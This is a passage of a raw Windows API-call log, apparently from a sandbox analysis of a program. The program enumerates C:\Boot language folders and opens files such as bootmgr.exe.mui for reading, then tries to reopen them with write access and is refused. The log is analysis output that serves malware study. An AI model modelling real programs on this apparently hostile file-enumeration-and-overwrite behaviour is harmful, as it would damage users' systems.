lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Boot\\nb-NO\\memtest.exe.mui", lpUsedDefaultChar=0x0) returned 30 [0070.431] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88680 [0070.431] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0070.431] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0070.431] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf90 [0070.432] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cfc0 [0070.432] AreFileApisANSI () returned 1 [0070.432] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x88680, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 30 [0070.432] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x3c) returned 0x53298 [0070.432] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x88680, cbMultiByte=-1, lpWideCharStr=0x53298, cchWideChar=30 | out: lpWideCharStr="C:\\Boot\\nb-NO\\memtest.exe.mui") returned 30 [0070.432] CreateFileW (lpFileName="C:\\Boot\\nb-NO\\memtest.exe.mui" (normalized: "c:\\boot\\nb-no\\memtest.exe.mui"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x41c [0070.432] GetFileType (hFile=0x41c) returned 0x1 [0070.432] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53298 | out: hHeap=0x20000) returned 1 [0070.432] SetFilePointerEx (in: hFile=0x41c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5e8 | out: lpNewFilePointer=0x0) returned 1 [0070.432] SetFilePointerEx (in: hFile=0x41c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f59c | out: lpNewFilePointer=0x0) returned 1 [0070.433] SetFilePointerEx (in: hFile=0x41c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5b4 | out: lpNewFilePointer=0x0) returned 1 [0070.433] CloseHandle (hObject=0x41c) returned 1 [0070.433] AreFileApisANSI () returned 1 [0070.433] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x88680, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 30 [0070.433] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x3c) returned 0x53370 [0070.433] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x88680, cbMultiByte=-1, lpWideCharStr=0x53370, cchWideChar=30 | out: lpWideCharStr="C:\\Boot\\nb-NO\\memtest.exe.mui") returned 30 [0070.433] CreateFileW (lpFileName="C:\\Boot\\nb-NO\\memtest.exe.mui" (normalized: "c:\\boot\\nb-no\\memtest.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0070.433] GetLastError () returned 0x5 [0070.433] GetLastError () returned 0x5 [0070.433] SetLastError (dwErrCode=0x5) [0070.433] GetLastError () returned 0x5 [0070.433] SetLastError (dwErrCode=0x5) [0070.433] GetLastError () returned 0x5 [0070.433] SetLastError (dwErrCode=0x5) [0070.433] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53370 | out: hHeap=0x20000) returned 1 [0070.433] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfc0 | out: hHeap=0x20000) returned 1 [0070.433] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf90 | out: hHeap=0x20000) returned 1 [0070.433] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88680 | out: hHeap=0x20000) returned 1 [0070.433] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0070.434] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0070.434] FindNextFileW (in: hFindFile=0x78710, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x313f498, ftCreationTime.dwHighDateTime=0x3a, ftLastAccessTime.dwLowDateTime=0x313f420, ftLastAccessTime.dwHighDateTime=0x77892b2c, ftLastWriteTime.dwLowDateTime=0x69178, ftLastWriteTime.dwHighDateTime=0x313f210, nFileSizeHigh=0x3a, nFileSizeLow=0x0, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="", cAlternateFileName="渘Ĉ㪀ā湈Ĉ̓놠")) returned 0 [0070.434] FindClose (in: hFindFile=0x78710 | out: hFindFile=0x78710) returned 1 [0070.434] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cfc0 [0070.434] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f0c8 [0070.434] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfc0 | out: hHeap=0x20000) returned 1 [0070.434] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f0c8 | out: hHeap=0x20000) returned 1 [0070.434] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0070.434] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88658 | out: hHeap=0x20000) returned 1 [0070.434] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0070.434] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf10 | out: hHeap=0x20000) returned 1 [0070.434] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f2c8 | out: hHeap=0x20000) returned 1 [0070.434] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x46748 | out: hHeap=0x20000) returned 1 [0070.434] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d010 [0070.434] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f0c8 [0070.434] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d010 | out: hHeap=0x20000) returned 1 [0070.434] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f0c8 | out: hHeap=0x20000) returned 1 [0070.434] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d080 [0070.434] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f2c8 [0070.434] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d080 | out: hHeap=0x20000) returned 1 [0070.434] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f2c8 | out: hHeap=0x20000) returned 1 [0070.434] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88428 [0070.434] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88400 [0070.434] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88428 | out: hHeap=0x20000) returned 1 [0070.434] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0070.434] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0070.434] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0070.434] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0070.434] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88400 | out: hHeap=0x20000) returned 1 [0070.434] AreFileApisANSI () returned 1 [0070.434] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Boot\\nl-NL", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Boot\\nl-NL", lpUsedDefaultChar=0x0) returned 14 [0070.434] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0070.434] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0070.434] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf90 [0070.435] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cfc0 [0070.435] AreFileApisANSI () returned 1 [0070.435] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x313f8e8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 14 [0070.435] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x1c) returned 0x88748 [0070.435] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x313f8e8, cbMultiByte=-1, lpWideCharStr=0x88748, cchWideChar=14 | out: lpWideCharStr="C:\\Boot\\nl-NL") returned 14 [0070.435] CreateFileW (lpFileName="C:\\Boot\\nl-NL" (normalized: "c:\\boot\\nl-nl"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0070.435] GetLastError () returned 0x5 [0070.435] GetLastError () returned 0x5 [0070.435] SetLastError (dwErrCode=0x5) [0070.435] GetLastError () returned 0x5 [0070.435] SetLastError (dwErrCode=0x5) [0070.435] GetLastError () returned 0x5 [0070.435] SetLastError (dwErrCode=0x5) [0070.435] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0070.435] AreFileApisANSI () returned 1 [0070.435] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x313f8e8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 14 [0070.435] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x1c) returned 0x885b8 [0070.435] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x313f8e8, cbMultiByte=-1, lpWideCharStr=0x885b8, cchWideChar=14 | out: lpWideCharStr="C:\\Boot\\nl-NL") returned 14 [0070.435] CreateFileW (lpFileName="C:\\Boot\\nl-NL" (normalized: "c:\\boot\\nl-nl"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0070.435] GetLastError () returned 0x5 [0070.435] GetLastError () returned 0x5 [0070.435] SetLastError (dwErrCode=0x5) [0070.436] GetLastError () returned 0x5 [0070.436] SetLastError (dwErrCode=0x5) [0070.436] GetLastError () returned 0x5 [0070.436] SetLastError (dwErrCode=0x5) [0070.436] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0070.436] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfc0 | out: hHeap=0x20000) returned 1 [0070.436] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf90 | out: hHeap=0x20000) returned 1 [0070.436] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0070.436] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0070.436] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0070.436] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0070.436] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88658 [0070.436] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0070.436] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88658 | out: hHeap=0x20000) returned 1 [0070.436] FindNextFileW (in: hFindFile=0x78e50, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc4912aed, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xef65403a, ftLastAccessTime.dwHighDateTime=0x1d3273d, ftLastWriteTime.dwLowDateTime=0xef65403a, ftLastWriteTime.dwHighDateTime=0x1d3273d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="pl-PL", cAlternateFileName="")) returned 1 [0070.436] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf00 [0070.436] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f0c8 [0070.436] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887c0 [0070.436] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0070.436] FindFirstFileExW (in: lpFileName="C:\\Boot\\nl-NL\\*", fInfoLevelId=0x0, lpFindFileData=0x313ef40, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x0 | out: lpFindFileData=0x313ef40) returned 0x78310 [0070.436] FindNextFileW (in: hFindFile=0x78310, lpFindFileData=0x313ecc4 | out: lpFindFileData=0x313ecc4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc4912aed, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xa010e4fa, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xef6407cf, ftLastWriteTime.dwHighDateTime=0x1d3273d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0070.436] FindNextFileW (in: hFindFile=0x78310, lpFindFileData=0x313ecc4 | out: lpFindFileData=0x313ecc4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc4912aed, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xc4912aed, ftLastAccessTime.dwHighDateTime=0x1d32764, ftLastWriteTime.dwLowDateTime=0x211543da, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x13160, dwReserved0=0x0, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0070.436] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0070.436] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0070.437] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0070.437] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887e8 [0070.437] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88810 [0070.437] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887e8 | out: hHeap=0x20000) returned 1 [0070.437] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0070.437] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0070.437] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0070.437] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88810 | out: hHeap=0x20000) returned 1 [0070.437] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88658 [0070.437] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x68) returned 0x46048 [0070.437] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0070.437] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d050 [0070.437] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f2c8 [0070.437] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d050 | out: hHeap=0x20000) returned 1 [0070.437] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f2c8 | out: hHeap=0x20000) returned 1 [0070.437] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf90 [0070.437] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f2c8 [0070.437] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf90 | out: hHeap=0x20000) returned 1 [0070.437] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f2c8 | out: hHeap=0x20000) returned 1 [0070.437] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88388 [0070.437] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88680 [0070.437] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0070.437] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x536d0 [0070.437] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88680 | out: hHeap=0x20000) returned 1 [0070.437] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0070.437] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53718 [0070.437] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x536d0 | out: hHeap=0x20000) returned 1 [0070.437] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0070.437] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0070.437] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0070.437] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0070.437] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53718 | out: hHeap=0x20000) returned 1 [0070.437] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88388 | out: hHeap=0x20000) returned 1 [0070.437] AreFileApisANSI () returned 1 [0070.437] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Boot\\nl-NL\\bootmgr.exe.mui", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Boot\\nl-NL\\bootmgr.exe.mui", lpUsedDefaultChar=0x0) returned 30 [0070.437] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0070.438] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0070.438] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0070.438] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf10 [0070.438] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf20 [0070.438] AreFileApisANSI () returned 1 [0070.438] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x885b8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 30 [0070.438] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x3c) returned 0x53370 [0070.438] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x885b8, cbMultiByte=-1, lpWideCharStr=0x53370, cchWideChar=30 | out: lpWideCharStr="C:\\Boot\\nl-NL\\bootmgr.exe.mui") returned 30 [0070.438] CreateFileW (lpFileName="C:\\Boot\\nl-NL\\bootmgr.exe.mui" (normalized: "c:\\boot\\nl-nl\\bootmgr.exe.mui"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x41c [0070.439] GetFileType (hFile=0x41c) returned 0x1 [0070.439] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53370 | out: hHeap=0x20000) returned 1 [0070.439] SetFilePointerEx (in: hFile=0x41c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5e8 | out: lpNewFilePointer=0x0) returned 1 [0070.439] SetFilePointerEx (in: hFile=0x41c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f59c | out: lpNewFilePointer=0x0) returned 1 [0070.439] SetFilePointerEx (in: hFile=0x41c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5b4 | out: lpNewFilePointer=0x0) returned 1 [0070.439] CloseHandle (hObject=0x41c) returned 1 [0070.439] AreFileApisANSI () returned 1 [0070.439] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x885b8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 30 [0070.439] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x3c) returned 0x533b8 [0070.439] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x885b8, cbMultiByte=-1, lpWideCharStr=0x533b8, cchWideChar=30 | out: lpWideCharStr="C:\\Boot\\nl-NL\\bootmgr.exe.mui") returned 30 [0070.440] CreateFileW (lpFileName="C:\\Boot\\nl-NL\\bootmgr.exe.mui" (normalized: "c:\\boot\\nl-nl\\bootmgr.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0070.440] GetLastError () returned 0x5 [0070.440] GetLastError () returned 0x5 [0070.440] SetLastError (dwErrCode=0x5) [0070.440] GetLastError () returned 0x5 [0070.440] SetLastError (dwErrCode=0x5) [0070.440] GetLastError () returned 0x5 [0070.440] SetLastError (dwErrCode=0x5) [0070.440] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x533b8 | out: hHeap=0x20000) returned 1 [0070.440] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf20 | out: hHeap=0x20000) returned 1 [0070.440] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf10 | out: hHeap=0x20000) returned 1 [0070.440] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0070.440] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0070.440] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0070.440] FindNextFileW (in: hFindFile=0x78310, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc4912aed, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xef6407cf, ftLastAccessTime.dwHighDateTime=0x1d3273d, ftLastWriteTime.dwLowDateTime=0xf2fb5e6c, ftLastWriteTime.dwHighDateTime=0x1d2a02f, nFileSizeHigh=0x0, nFileSizeLow=0xb1a0, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="memtest.exe.mui", cAlternateFileName="MEMTES~1.MUI")) returned 1 [0070.440] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0070.440] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0070.440] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88680 [0070.440] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887e8 [0070.440] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88680 | out: hHeap=0x20000) returned 1 [0070.440] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0070.440] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0070.440] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887e8 | out: hHeap=0x20000) returned 1 [0070.440] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d070 [0070.440] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f2c8 [0070.440] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d070 | out: hHeap=0x20000) returned 1 [0070.440] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f2c8 | out: hHeap=0x20000) returned 1 [0070.440] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cfc0 [0070.440] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f2c8 [0070.441] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfc0 | out: hHeap=0x20000) returned 1 [0070.441] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f2c8 | out: hHeap=0x20000) returned 1 [0070.441] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0070.441] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0070.441] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88428 [0070.441] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x538c8 [0070.441] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0070.441] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88428 | out: hHeap=0x20000) returned 1 [0070.441] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x536d0 [0070.441] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x538c8 | out: hHeap=0x20000) returned 1 [0070.441] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, 